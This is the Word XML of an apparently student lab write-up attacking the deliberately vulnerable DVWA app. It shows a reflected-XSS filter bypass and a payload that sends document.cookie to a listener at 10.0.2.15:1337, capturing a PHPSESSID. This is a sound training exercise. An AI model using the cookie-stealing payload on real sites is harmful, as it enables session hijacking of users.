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856CD" w14:textId="2972CF66" w:rsidR="00F83F92" w:rsidRDefault="00F83F92" w:rsidP="00F83F92">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83F92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack on web application ‘DVWA’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9DDD6" w14:textId="4D3820DA" w:rsidR="00867068" w:rsidRDefault="00867068" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>In this assignment I will look at the various different attacks on web applications and will be attempting to carry</w:t>
      </w:r>
      <w:r w:rsidR="002F531E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> them out. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5127BA" w14:textId="3B55A59D" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">For this task I will use a vunerable web application called DVWA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288348E4" w14:textId="023CDA80" w:rsidR="00816A68" w:rsidRDefault="00F83F92" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA is a vunerable web application which Is designed for secuirty purposes in which an individual can test skills in a legal environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE3825" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348A089B" w14:textId="2124AE7F" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I will attempt to carry out the following;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E6959" w14:textId="1A68C58F" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="002F531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ile uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FC648" w14:textId="6359AEA7" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="002F531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XSS (reflected) </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk66400023"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>on multiple difficulties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="116E4F6A" w14:textId="4E29BFA3" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="002F531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XSS (Stored) </w:t>
      </w:r>
      <w:r w:rsidRPr="002F531E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>on m</w:t>
      </w:r>
      <w:r w:rsidR="00503883">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>edium difficulty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BDF05" w14:textId="65BE7D7A" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="002F531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SQL Injection </w:t>
      </w:r>
      <w:r w:rsidRPr="002F531E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>on multiple difficulties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A74D0" w14:textId="1A368E02" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="002F531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LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F295C1" w14:textId="2654E967" w:rsidR="002F531E" w:rsidRPr="00A578F2" w:rsidRDefault="002F531E" w:rsidP="002F531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FI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07414BB7" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB69B05" w14:textId="1D84FED4" w:rsidR="002F531E" w:rsidRPr="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Note: IP address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> of host machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> have been changed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">during </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>the course of testing due failures in some tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ACDCF3" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23202402" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0AC4A2" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048FEC6B" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218F4CF0" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E1C911" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A198C1" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666EF765" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BE1098" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550B7F7C" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C25495" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07513609" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004BCE7B" w14:textId="77777777" w:rsidR="002F531E" w:rsidRDefault="002F531E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B5EB3F" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BC41C7" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40123B20" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395B5CD1" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7359A731" w14:textId="117E67A8" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1A1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidR="002F531E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">reflected </w:t>
      </w:r>
      <w:r w:rsidRPr="000A1A1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>(medium difficulty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5C577" w14:textId="7CBD68AF" w:rsidR="000A1A1C" w:rsidRPr="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1A1C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The string replace now replaces all instance of script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A490A6" w14:textId="60E91A9F" w:rsidR="000A1A1C" w:rsidRPr="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92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69AF2093" wp14:editId="3142A0B3">
            <wp:extent cx="5731510" cy="37890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4E55" w14:textId="516700DF" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77995DB9" w14:textId="72B4B232" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>As we now know the programme will attempt to get rid of the &lt;script&gt; tag I used the foll</w:t>
      </w:r>
      <w:r w:rsidR="002C5E67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">wing to attempt to bypass this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFCDF0" w14:textId="664A7DCA" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1A1C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>&lt;scr</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1A1C">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1A1C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ipt&gt;alert("You have been hacked")&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002C5E67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. (So the website will neglect the red code). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18539A16" w14:textId="64B987D6" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>After running the command I can see a sim</w:t>
      </w:r>
      <w:r w:rsidR="00992BC8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">lar message as when I was attempting on low difficulty. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7E1E4" w14:textId="28A1A6EB" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8D5CF6" w14:textId="19250F58" w:rsidR="000A1A1C" w:rsidRDefault="000A1A1C" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEE34D9" wp14:editId="1B7E2CB0">
            <wp:extent cx="5731510" cy="21799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5B17" w14:textId="3FFF3B3D" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B499EB" w14:textId="77777777" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DB9FA4" w14:textId="77777777" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">After entering the following on DVWA application; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70F6A0" w14:textId="5BB2430C" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5E67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>&lt;scr</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5E67">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5E67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ipt&gt;window.location='http://10.0.2.15:1337/?cookie=' + document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A03B9B" w14:textId="60C304FD" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5E67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CC43631" wp14:editId="04B572BC">
            <wp:extent cx="5731510" cy="11004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51C0" w14:textId="6980C4E0" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Kali shows the following information from DVWA;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DC222" w14:textId="727A8E74" w:rsidR="002C5E67" w:rsidRDefault="002C5E67" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5E67">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308BEEDC" wp14:editId="452BF827">
            <wp:extent cx="6366417" cy="590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545" b="-23993"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6371258" cy="59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7FB43" w14:textId="73942025" w:rsidR="007F2E07" w:rsidRDefault="007F2E07" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>An attacker could use the cookies to login to a vunerable site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299024FB" w14:textId="77777777" w:rsidR="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420443FA" w14:textId="1B96D680" w:rsidR="00A578F2" w:rsidRDefault="00503883" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;scr&lt;script&gt;ipt&gt;window.location='http://10.0.2.15:1337/?cookie=' + document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFA380" w14:textId="1CEF8C24" w:rsidR="00D06A50" w:rsidRPr="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I set up a python -m SimpleHTTPServer 1337 which was listening for a connection from DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A622B" w14:textId="773CE5FA" w:rsidR="00A578F2" w:rsidRPr="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="764F9331" wp14:editId="2DAA45A8">
            <wp:extent cx="5731510" cy="2050415"/>
            <wp:effectExtent l="0" t="0" r="254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AD84" w14:textId="1862A669" w:rsidR="00A578F2" w:rsidRPr="00D06A50" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00D06A50" w:rsidRPr="00D06A50">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:color w:val="FF0000"/>
          </w:rPr>
          <w:t>http://10.0.2.15:1337/?cookie=security=medium;%20PHPSESSID=rmknc47b6vp02rgou1fk5v15u6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D06A50" w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D06A50" w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>(what is inputted on web server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8B18F" w14:textId="3DD63ACF" w:rsidR="00A578F2" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E9ADED4" wp14:editId="6475E633">
            <wp:extent cx="5731510" cy="2415540"/>
            <wp:effectExtent l="0" t="0" r="254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43C6" w14:textId="5831164A" w:rsidR="00A578F2" w:rsidRPr="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Kali now shows the cookie information for the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54580B" w14:textId="7D09FE96" w:rsidR="00A578F2" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0378C80B" wp14:editId="778C7744">
            <wp:extent cx="5731510" cy="84137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172B" w14:textId="28A7AB70" w:rsidR="00A578F2" w:rsidRPr="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>An attacker could use the cookies to login to a vunerable site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC4E36" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637F1AC5" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EDB706" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381562F2" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07029C5C" w14:textId="77777777" w:rsidR="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C95CB0" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA0A393" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7492E9D6" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA16FBB" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A1D01F" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E583053" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C08D1E" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCB1CF8" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB88A1F" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BC914A" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6D8133" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
